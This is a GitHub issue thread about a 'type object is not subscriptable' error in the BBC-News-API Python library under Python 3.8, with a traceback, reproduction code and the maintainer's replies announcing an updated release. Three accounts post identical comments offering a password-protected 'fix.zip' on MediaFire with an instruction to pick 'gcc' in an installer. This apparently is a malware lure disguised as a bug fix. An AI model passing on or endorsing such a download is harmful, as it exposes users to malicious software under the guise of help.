### ISSUE TITLE
TypeError: 'type' object is not subscriptable

### ISSUE THREAD

**Issue by smyja** [Sayad-Uddin-Tahsin/BBC-News-API#19]
**Describe the bug**
```
  File "p.py", line 2, in <module>
    import bbc
  File "/Users/mac/Documents/GitHub/muna/venvv/lib/python3.8/site-packages/bbc/__init__.py", line 3, in <module>
    from bbc import news
  File "/Users/mac/Documents/GitHub/muna/venvv/lib/python3.8/site-packages/bbc/news.py", line 9, in <module>
    class News():
  File "/Users/mac/Documents/GitHub/muna/venvv/lib/python3.8/site-packages/bbc/news.py", line 13, in News
    def news_category(self, category_name: str) -> list[dict]:
TypeError: 'type' object is not subscriptable
```

**To Reproduce**
```
# Import the Library
import bbc
# Get the Latest News for English
news = bbc.news.get_news(bbc.Languages.English)
print(news)
# Get the Category Titles
categories = news.news_categories()
# Loop through the category titles
for category in categories:
    # Get the Category News
    section_news = news.news_category(category)
    print(section_news)
    # Loop through the news dictionary
    for news_dict in section_news:
        # Print the Title
        print(news_dict['title'])
        # Print the News Description
        print(news_dict['news_description'])
        # ---------------- Note ----------------
        # | English News' Image Link couldn't  |
        # |            be retrived             |
        # |====================================|
        # |    Sorry for the inconvenience     |
        # --------------------------------------
        # Print the News Link
        print(news_dict["news_link"])
        
        # Print a Blank Line
        print("---")

```

**Desktop (please complete the following information):**
 - OS: Mac OS
 - Version: Python 3.8.15

**Additional context**

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sayad-Uddin-Tahsin** [comment]
@smyja, can you share the exact code you're using which is raising the error? Also, regarding the latest changes in #16 & #18 the library is not properly updated, I just noticed that! Again, thanks for your interest in BBC News API! I'm onto the issue!

**Comment by smyja** [comment]
> @smyja, can you share the exact code you're using which is raising the error? Also, regarding the latest changes in #16 & #18 the library is not properly updated, I just noticed that! Again, thanks for your interest in BBC News API! I'm onto the issue!

i added it in my description, but here it is again. I believe its because of the python version because i updated to 3.10 and i didn't see that error.
```
# Import the Library
import bbc
# Get the Latest News for English
news = bbc.news.get_news(bbc.Languages.English)
print(news)
# Get the Category Titles
categories = news.news_categories()
# Loop through the category titles
for category in categories:
    # Get the Category News
    section_news = news.news_category(category)
    print(section_news)
    # Loop through the news dictionary
    for news_dict in section_news:
        # Print the Title
        print(news_dict['title'])
        # Print the News Description
        print(news_dict['news_description'])
        # ---------------- Note ----------------
        # | English News' Image Link couldn't  |
        # |            be retrived             |
        # |====================================|
        # |    Sorry for the inconvenience     |
        # --------------------------------------
        # Print the News Link
        print(news_dict["news_link"])
        
        # Print a Blank Line
        print("---")

```

**Comment by Sayad-Uddin-Tahsin** [comment]
> > @smyja, can you share the exact code you're using which is raising the error? Also, regarding the latest changes in #16 & #18 the library is not properly updated, I just noticed that! Again, thanks for your interest in BBC News API! I'm onto the issue!
> 
> i added it in my description, but here it is again. I believe its because of the python version because i updated to 3.10 and i didn't see that error.
> 
> ```
> # Import the Library
> import bbc
> # Get the Latest News for English
> news = bbc.news.get_news(bbc.Languages.English)
> print(news)
> # Get the Category Titles
> categories = news.news_categories()
> # Loop through the category titles
> for category in categories:
>     # Get the Category News
>     section_news = news.news_category(category)
>     print(section_news)
>     # Loop through the news dictionary
>     for news_dict in section_news:
>         # Print the Title
>         print(news_dict['title'])
>         # Print the News Description
>         print(news_dict['news_description'])
>         # ---------------- Note ----------------
>         # | English News' Image Link couldn't  |
>         # |            be retrived             |
>         # |====================================|
>         # |    Sorry for the inconvenience     |
>         # --------------------------------------
>         # Print the News Link
>         print(news_dict["news_link"])
>         
>         # Print a Blank Line
>         print("---")
> ```

@smyja, It's good that you didn't get the error, but for latest changes the library is Outdated as the API now supports `Yoruba`. This issue reminded me of what I've done/forgotten.

**Comment by Sayad-Uddin-Tahsin** [comment]
@smyja, I've [released](https://github.com/Sayad-Uddin-Tahsin/BBC-News-API/releases/tag/v2.4) a v1.0.2 of the library just now! Please update to that by using: ```console
python -m pip install -U bbc-news
```
In this version, `Yoruba` news can be retrieved along with some modifications on the library!

Thanks for using BBC News API
